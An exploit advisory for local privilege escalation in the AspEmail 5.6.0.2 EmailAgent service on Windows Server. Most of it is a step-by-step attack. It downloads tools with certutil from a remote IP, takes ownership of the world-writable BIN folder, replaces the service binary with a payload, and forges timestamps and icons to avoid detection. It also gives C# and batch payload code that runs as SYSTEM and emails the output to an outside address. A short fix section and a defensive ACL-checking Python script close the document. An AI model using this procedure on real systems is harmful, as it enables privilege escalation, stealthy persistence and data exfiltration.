####################################################################################################################
# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation
# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability]
# Date: 13/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: https://www.aspemail.com
# Software Link: https://www.aspemail.com/download.html
# Product: AspEmail
# Version: AspEmail 5.6.0.2 and all
# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU
# Tested on: Windows Server 2016 and Windows Server 2019
# CVE : 0DAY
####################################################################################################################

# ==================================================================================================================

[+] C:\PenTest>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

# ==================================================================================================================

* First, we test whether the AspEmail service is active. With normal user rights we list the processes
  running on the system and check whether the process of the relevant service is among them:

[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe                4400 Persits Software EmailAgent

or

[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe              4400 Persits Software EmailAgent

* We have confirmed that the process of the "Persits Software EmailAgent" service is in the RUNNING state.
* Now we know that the AspEmail service is active.

# ==================================================================================================================

* We will need these files:

[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe"   <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"

# ==================================================================================================================

[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Name              : Persits Software EmailAgent
ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
User              : LocalSystem
ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
                    AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes,
                    WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status            : Unknown
UserCanStart      : False
UserCanStop       : False

[+] C:\PenTest>del PrivescCheck.ps1

* Our checks flag a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service: the directory
  that holds the service binary is modifiable by Everyone while the service runs as LocalSystem.
# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.

* We do not have permission to access this directory or its subdirectories.

# ==================================================================================================================

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                     DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                                                     BUILTIN\Administrators:(I)(F)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)

* Unlike the other directories, we have full privileges in the "BIN" directory of the service.
* In Linux terms this is chmod 0777 (rwxrwxrwx).
# ==================================================================================================================

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16

[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators

* This tells us that "EmailAgent.exe" was installed by the Administrator and is owned by BUILTIN\Administrators.

# ==================================================================================================================

* Now we take ownership of this directory, since we will carry out our operations under the "BIN" directory.

[+] C:\PenTest>whoami
DeepSecLab\Hacker

[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files

* OK. All commands completed successfully. We now have full privileges on this directory.

# ==================================================================================================================

* Now we replace the EmailAgent binary with a self-written payload.
* We will be careful not to damage any files while doing this, so that all changes can easily be undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
13.04.2023  22:00            12.288 EmailAgent.exe          <<<=== renamed from EmailAgentPrivESC.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free

# ==================================================================================================================

* Now we adjust the Last Modified, Creation and Last Accessed dates.

[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe

* Next, we extract the icon from the real EmailAgent.exe and apply it to the exploit binary. This makes it harder to detect.
* I used the Resource Tuner Console tool.
  >>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can also be done easily with the Resource Tuner tool.
  >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
  >>> http://www.restuner.com/download.htm

# ==================================================================================================================

[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
24.09.2003  09:21            12.288 EmailAgent.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free

[24.09.2003 09:21]   12.288 EmailAgent.exe
[24.09.2003 09:21]  167.936 Null.EmailAgent.exe

* The timestamp manipulation is done. Both files now look as if they were written at the same time, long ago.

# ==================================================================================================================

* Now we check who owns the replaced binary.

[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID

__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"
root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28

[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker

EmailAgent.exe Owner: DeepSecLab\Hacker

# ==================================================================================================================

####################################################################################################################
# [EmailAgent.cs]
####################################################################################################################

* We write this payload so that when the server is rebooted (i.e. when the services are restarted),
* it is triggered and executes the commands we want,
* and then emails the output of all this to the address we specified.

using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Collections;

namespace CliToolSpace
{
    class _Main
    {
        static void Main(string[] args)
        {
            Cli commandLine = new Cli();
            commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
            commandLine.Execute();
            commandLine.ToFile(@"C:\Windows\Temp\");
        }
    }
}

####################################################################################################################
# [Mail.cs]
####################################################################################################################

using System;
using System.Net.Mail;
using System.Net;

SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
var mail = new MailMessage();
mail.From = new MailAddress("mail@deepseclab.com");
mail.To.Add("mail@hacker.com");
mail.Subject = "Trigger Successful!";
mail.IsBodyHtml = true;
string htmlBody;
htmlBody = "<strong>This server has been rebooted.</strong>";
mail.Body = htmlBody;
Attachment attachment;
attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;
SmtpServer.UseDefaultCredentials = false;
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com", "p@ssw0rd123");
SmtpServer.EnableSsl = true;
SmtpServer.Timeout = int.MaxValue;
SmtpServer.Send(mail);

####################################################################################################################
# [Run.bat]
####################################################################################################################

whoami > C:\Windows\Temp\Export.txt
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
cd c:\Windows\Tasks
del Run.bat & del Mail.exe

####################################################################################################################

[+] Trigger Successful! [+]

[+] C:\PenTest>systeminfo | findstr "Boot Time"
System Boot Time:          13.04.2022, 07:46:06

####################################################################################################################
# [Export.txt]
####################################################################################################################

NT AUTHORITY\SYSTEM

####################################################################################################################

# ==================================================================================================================
# ...|||[FIX]|||...
# ==================================================================================================================

[+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD

# ==================================================================================================================

[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Persits Software EmailAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Persits Software EmailAgent
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

# ==================================================================================================================

[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

# ==================================================================================================================

[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Persits Software EmailAgent
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS

# ==================================================================================================================

[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET

[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.

DONE!

# ==================================================================================================================

[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"

* These commands are optional. They stop and start the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it is necessary anymore.

# ==================================================================================================================
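As an added defender-side check (not part of the advisory), the following Python parses the output of `icacls` for a service's binary directory and flags ACEs that give Everyone, BUILTIN\Users or another broad principal write-capable rights; it serves both the detection step (the world-writable BIN listing above) and the verification of the ICACLS /RESET fix. The two sample listings are constructed to mirror the advisory's output, and the BIN path is the one quoted in the advisory.

```python
import re

# Inheritance tokens icacls prints in parentheses; they grant no rights by themselves.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple and specific rights that let a principal replace or alter files in a directory:
# full, modify, write, generic all/write, write/append data, delete child, write DAC, write owner, delete.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "DC", "WDAC", "WO", "DE"}
# Principals that every local user belongs to (compared case-insensitively).
BROAD_PRINCIPALS = {"everyone", "builtin\\users",
                    "nt authority\\authenticated users", "nt authority\\interactive"}
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<aces>(?:\([^)]*\))+)$")

def parse_icacls(output: str, path: str) -> list:
    """Turn the output of `icacls <path>` into (principal, [rights]) pairs."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):          # only the first ACE line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                       # blank line or the "Successfully processed" summary
        tokens = re.findall(r"\(([^)]*)\)", m.group("aces"))
        if "DENY" in tokens:
            continue                       # a deny ACE never grants access
        rights = [r for t in tokens if t not in INHERIT_FLAGS
                  for r in t.split(",") if r]
        entries.append((m.group("principal"), rights))
    return entries

def world_writable_aces(output: str, path: str) -> list:
    """ACEs that hand a broad principal write-capable rights on `path`."""
    return [(p, r) for p, r in parse_icacls(output, path)
            if p.lower() in BROAD_PRINCIPALS and WRITE_RIGHTS & set(r)]

# Constructed samples modelled on the advisory's listing of the BIN directory,
# before and after the ICACLS /RESET fix (not output captured from the page).
BIN_PATH = r"C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SAMPLE_BEFORE = BIN_PATH + r""" Everyone:(OI)(CI)(F)
    DeepSecLab\psacln:(I)(OI)(CI)(N)
    BUILTIN\Administrators:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_AFTER = BIN_PATH + r""" BUILTIN\Administrators:(I)(OI)(CI)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    print("before fix:", world_writable_aces(SAMPLE_BEFORE, BIN_PATH))   # [('Everyone', ['F'])]
    print("after fix: ", world_writable_aces(SAMPLE_AFTER, BIN_PATH))    # []
```

Run it against real output by piping `icacls "<service binary directory>"` into `parse_icacls` with the same path; any non-empty result from `world_writable_aces` for a service running as LocalSystem is the condition this advisory abuses.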